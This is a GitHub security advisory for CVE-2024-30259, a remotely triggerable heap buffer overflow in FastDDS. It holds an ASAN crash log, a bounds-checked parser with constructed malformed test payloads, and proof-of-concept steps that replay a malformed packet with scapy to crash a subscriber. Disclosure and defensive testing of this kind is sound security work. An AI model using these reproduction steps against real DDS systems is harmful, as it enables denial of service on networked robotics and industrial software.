
Heap buffer overflow when publisher send malformed packet

High
EduPonz published GHSA-qcj9-939p-p662 May 13, 2024

Package

FastDDS

Affected versions

<= 2.14.0

Patched versions

2.14.1 / 2.13.5 / 2.10.4 / 2.6.8

Description

Summary

When a publisher serves a malformed RTPS packet, a heap buffer overflow occurs on the subscriber. This vulnerability can remotely crash FastDDS.

Details

Version

  • FastCDR commit 3c6195aefd11d46395caf7d8b29019b5ef5aaefd (HEAD -> master, origin/master, origin/HEAD, origin/2.1.x)
  • FastDDS commit e94c4b1 (HEAD -> 2.13.1, tag: v2.13.1, origin/2.13.1)
  • clang 11

When the sample subscriber is running and a publisher serves a malformed RTPS packet, a heap buffer overflow may occur while parsing the malformed PID_RELIABILITY_ENABLED serializedData.

Here is the detailed ASAN log:

$ ./DDSHelloWorldSubscriber
Starting subscriber.
=================================================================
==403754==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61100001a154 at pc 0x000000c2343c bp 0x7f28fcffa9b0 sp 0x7f28fcffa9a8
READ of size 4 at 0x61100001a154 thread T2
    #0 0xc2343b in eprosima::fastdds::dds::ParameterProperty_t::element_size(unsigned char const*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/dds/core/policy/ParameterTypes.hpp:1070:25
    #1 0xc2343b in eprosima::fastdds::dds::ParameterProperty_t::second[abi:cxx11]() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/dds/core/policy/ParameterTypes.hpp:979:26
    #2 0xc2343b in eprosima::fastrtps::rtps::ParticipantProxyData::get_persistence_guid() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:863:35
    #3 0x12843c4 in eprosima::fastrtps::rtps::EDPSimple::assignRemoteEndpoints(eprosima::fastrtps::rtps::ParticipantProxyData const&, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/endpoint/EDPSimple.cpp:773:52
    #4 0x124e214 in eprosima::fastrtps::rtps::PDPSimple::assign_low_level_remote_endpoints(eprosima::fastrtps::rtps::ParticipantProxyData const&, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPSimple.cpp:722:17
    #5 0x124e214 in eprosima::fastrtps::rtps::PDPSimple::assignRemoteEndpoints(eprosima::fastrtps::rtps::ParticipantProxyData*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPSimple.cpp:549:13
    #6 0x12548d6 in eprosima::fastrtps::rtps::PDPListener::process_alive_data(eprosima::fastrtps::rtps::ParticipantProxyData*, eprosima::fastrtps::rtps::ParticipantProxyData&, eprosima::fastrtps::rtps::GUID_t&, eprosima::fastrtps::rtps::RTPSReader*, std::unique_lock<std::recursive_mutex>&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:195:26
    #7 0x1253981 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:138:13
    #8 0x1a74add in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/reader/StatelessReader.cpp:371:31
    #9 0x1a77d86 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/reader/StatelessReader.cpp:640:18
    #10 0x1a98a46 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)::$_2::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:220:25
    #11 0x1a98a46 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)::$_2>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)::$_2 const&) const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:720:17
    #12 0x1a98a46 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:223:5
    #13 0x1aa391b in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, bool) const /usr/lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/std_function.h:591:9
    #14 0x1aa391b in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*, eprosima::fastrtps::rtps::EntityId_t&, bool) const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:901:5
    #15 0x1a9b7a1 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/messages/MessageReceiver.cpp:457:33
    #16 0xfc583b in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/ReceiverResource.cpp:135:14
    #17 0x1c4e354 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:79:33
    #18 0x1c506b2 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0::operator()() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:49:17
    #19 0x1c506b2 in eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, 
eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()::operator()() const /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/threading.hpp:99:24
    #20 0x1c506b2 in void* eprosima::thread::ThreadProxy<eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, 
eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()>(void*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_custom.hpp:56:9
    #21 0x7f2901894ac2 in start_thread nptl/./nptl/pthread_create.c:442:8
    #22 0x7f290192684f  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

0x61100001a154 is located 0 bytes to the right of 212-byte region [0x61100001a080,0x61100001a154)
allocated by thread T2 here:
    #0 0x72ee82 in calloc /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7c9db1 in eprosima::fastrtps::rtps::SerializedPayload_t::reserve(unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/rtps/common/SerializedPayload.h:174:28

Thread T2 created by T0 here:
    #0 0x71973a in pthread_create /home/nnelson/Documents/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:214:3
    #1 0xd8194c in eprosima::thread::start_thread_impl(int, void* (*)(void*), void*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_pthread.ipp:63:19
    #2 0x1c4d666 in eprosima::thread::thread<eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, 
eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int)::'lambda'()>(int, eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0&&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/thread_impl/thread_impl_custom.hpp:88:23
    #3 0x1c4d666 in eprosima::thread eprosima::create_thread<eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&)::$_0, unsigned int>(eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, 
eprosima::fastdds::rtps::ThreadSettings const&)::$_0, eprosima::fastdds::rtps::ThreadSettings const&, char const*, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/utils/threading.hpp:95:12
    #4 0x1c4d666 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp, asio::execution::any_executor<asio::execution::context_as_t<asio::execution_context&>, asio::execution::detail::blocking::never_t<0>, asio::execution::prefer_only<asio::execution::detail::blocking::possibly_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::tracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::outstanding_work::untracked_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::fork_t<0> >, asio::execution::prefer_only<asio::execution::detail::relationship::continuation_t<0> > > >&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*, eprosima::fastdds::rtps::ThreadSettings const&) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPChannelResource.cpp:51:12
    #5 0x1b0c925 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPTransportInterface.cpp:233:50
    #6 0x1b0b891 in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:34
    #7 0x11283f7 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/transport/UDPv4Transport.cpp:338:19
    #8 0xfc449e in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/ReceiverResource.cpp:46:24
    #9 0xfbea5e in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/network/NetworkFactory.cpp:101:25
    #10 0xfe514b in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool, bool) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1730:38
    #11 0xfdb6a3 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:381:5
    #12 0xfe7cf5 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:479:7

SUMMARY: AddressSanitizer: heap-buffer-overflow /mnt/EAE2CD0AE2CCDBC7/Fast-DDS/Fast-DDS/include/fastdds/dds/core/policy/ParameterTypes.hpp:1070:25 in eprosima::fastdds::dds::ParameterProperty_t::element_size(unsigned char const*)
Shadow bytes around the buggy address:
  0x0c227fffb3d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb3e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c227fffb3f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c227fffb400: 00 00 04 fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fffb420: 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa
  0x0c227fffb430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fffb470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==403754==ABORTING
$ ^C
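The trace above ends in a 4-byte read sitting exactly at the end of a 212-byte payload, i.e. a length word read without first checking that four bytes remain. The following is an added example, not Fast-DDS code: a bounds-checked parser for a CDR-style property list (the kind of (name, value) string pairs visible in the packet) that rejects a payload truncated at a length word and a length word that overstates the bytes available. The layout, the names and the little-endian host are assumptions for illustration.

```cpp
#include <cstdint>
#include <cstring>
#include <string>
#include <utility>
#include <vector>

// Added example, not Fast-DDS code: bounds-checked parsing of a CDR-style property
// list (uint32 count, then (name, value) string pairs; each string is a little-endian
// uint32 length that counts the NUL, the bytes, then padding to 4). Assumed layout.
struct Cursor {
    const uint8_t* p; size_t len; size_t pos = 0;
    size_t remaining() const { return len - pos; }
    // A length word is read only when 4 bytes are actually left: reading one at
    // the very end of the payload is the 4-byte over-read ASAN reported.
    bool read_u32(uint32_t& out) {
        if (remaining() < 4) return false;
        std::memcpy(&out, p + pos, 4);
        pos += 4;
        return true;
    }
    bool read_string(std::string& out) {
        uint32_t n;
        if (!read_u32(n)) return false;
        if (n == 0 || n > remaining()) return false;  // declared length must fit
        if (p[pos + n - 1] != 0) return false;        // must be NUL-terminated
        out.assign(reinterpret_cast<const char*>(p + pos), n - 1);
        pos += n;
        size_t pad = (4 - pos % 4) % 4;               // CDR alignment padding
        if (pad > remaining()) return false;
        pos += pad;
        return true;
    }
};
using PropertyList = std::vector<std::pair<std::string, std::string>>;
// Returns false as soon as any field would extend past the payload.
bool parse_property_list(const uint8_t* data, size_t len, PropertyList& out) {
    Cursor c{data, len};
    uint32_t count;
    if (!c.read_u32(count)) return false;
    if (count > c.remaining() / 8) return false;  // each pair needs >= 2 length words
    for (uint32_t i = 0; i < count; ++i) {
        std::string k, v;
        if (!c.read_string(k) || !c.read_string(v)) return false;
        out.emplace_back(std::move(k), std::move(v));
    }
    return true;
}
// --- constructed sample payloads (not captured traffic) ---
static void put_u32(std::vector<uint8_t>& b, uint32_t v) {
    for (int i = 0; i < 4; ++i) b.push_back(static_cast<uint8_t>(v >> (8 * i)));
}
static void put_string(std::vector<uint8_t>& b, const std::string& s) {
    put_u32(b, static_cast<uint32_t>(s.size() + 1));  // length counts the NUL
    b.insert(b.end(), s.begin(), s.end());
    b.push_back(0);
    while (b.size() % 4 != 0) b.push_back(0);         // pad to 4 bytes
}
std::vector<uint8_t> well_formed_sample() {
    std::vector<uint8_t> b;
    put_u32(b, 2);
    put_string(b, "PARTICIPANT_TYPE");              put_string(b, "SIMPLE");
    put_string(b, "fastdds.physical_data.process"); put_string(b, "345340");
    return b;
}
// Declares two pairs but ends exactly where the second value's length word should
// start, so an unchecked parser would read 4 bytes past the end of the buffer.
std::vector<uint8_t> truncated_sample() {
    std::vector<uint8_t> b = well_formed_sample();
    b.resize(b.size() - 12);  // drop the "345340" value: 4-byte length + 8 bytes
    return b;
}
// A string length word claiming far more bytes than the payload holds.
std::vector<uint8_t> oversized_length_sample() {
    std::vector<uint8_t> b;
    put_u32(b, 1); put_u32(b, 4096);
    b.insert(b.end(), 8, static_cast<uint8_t>('A'));
    return b;
}
// Number of pairs parsed, or -1 when the payload is rejected.
int parsed_pair_count(const std::vector<uint8_t>& b) {
    PropertyList pl;
    return parse_property_list(b.data(), b.size(), pl) ? static_cast<int>(pl.size()) : -1;
}
```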

Here is the malformed packet (TS + DATA):


PoC

Install Fast-DDS with given options

# I use clang11 with CFLAGS=-fsanitize=address, CXXFLAGS=-fsanitize=address
git clone https://github.com/eProsima/Fast-DDS.git -b 2.13.1
export FAST_DDS=$PWD/Fast-DDS
pushd $FAST_DDS
	cd src
	git clone --branch release-1.11.0 https://github.com/google/googletest.git googletest-distribution
	export GOOGLETEST=$PWD/googletest-distribution
	pushd $GOOGLETEST
		mkdir build
		cd build
		cmake .. -DCMAKE_INSTALL_PREFIX=/usr/local/ -DBUILD_SHARED_LIBS=OFF
		sudo cmake --build . --target install
		export LD_LIBRARY_PATH=/usr/local/lib/
		echo 'export LD_LIBRARY_PATH=/usr/local/lib/' >> ~/.bashrc
	popd
	mkdir ../build
	cd ../build
	cmake .. -DEPROSIMA_BUILD_TESTS=OFF -DSANITIZER=Address -DCMAKE_INSTALL_PREFIX=/usr/local/ -DBUILD_SHARED_LIBS=OFF -DEPROSIMA_BUILD=ON -DCMAKE_BUILD_TYPE=Release -DSECURITY=ON -DSHM_TRANSPORT_DEFAULT=OFF -DFASTDDS_STATISTICS=ON
	sudo cmake --build . --target install
popd

Build the project that processes the packet:
https://drive.google.com/file/d/1Y2bGvP3UIOJCLh_XEURLdhrM2Sznlvlp/view?usp=sharing (Sorry for the external upload, GitHub blocks file upload)

You can simply reproduce the error:

cd build
rm -rf *
cmake ..
make
./HelloWorldDDSExample

And the publisher packet replay:

pip3 install scapy
python3 runner.py

# (Keep Pressing Enter for sending packets)

You may need to run runner.py several times; the heap buffer overflow does not occur on every run.

https://vimeo.com/907641887?share=copy

Impact

This can remotely crash any Fast-DDS process, potentially leading to a DoS attack.

Severity

High 8.2 / 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

CVE ID

CVE-2024-30259
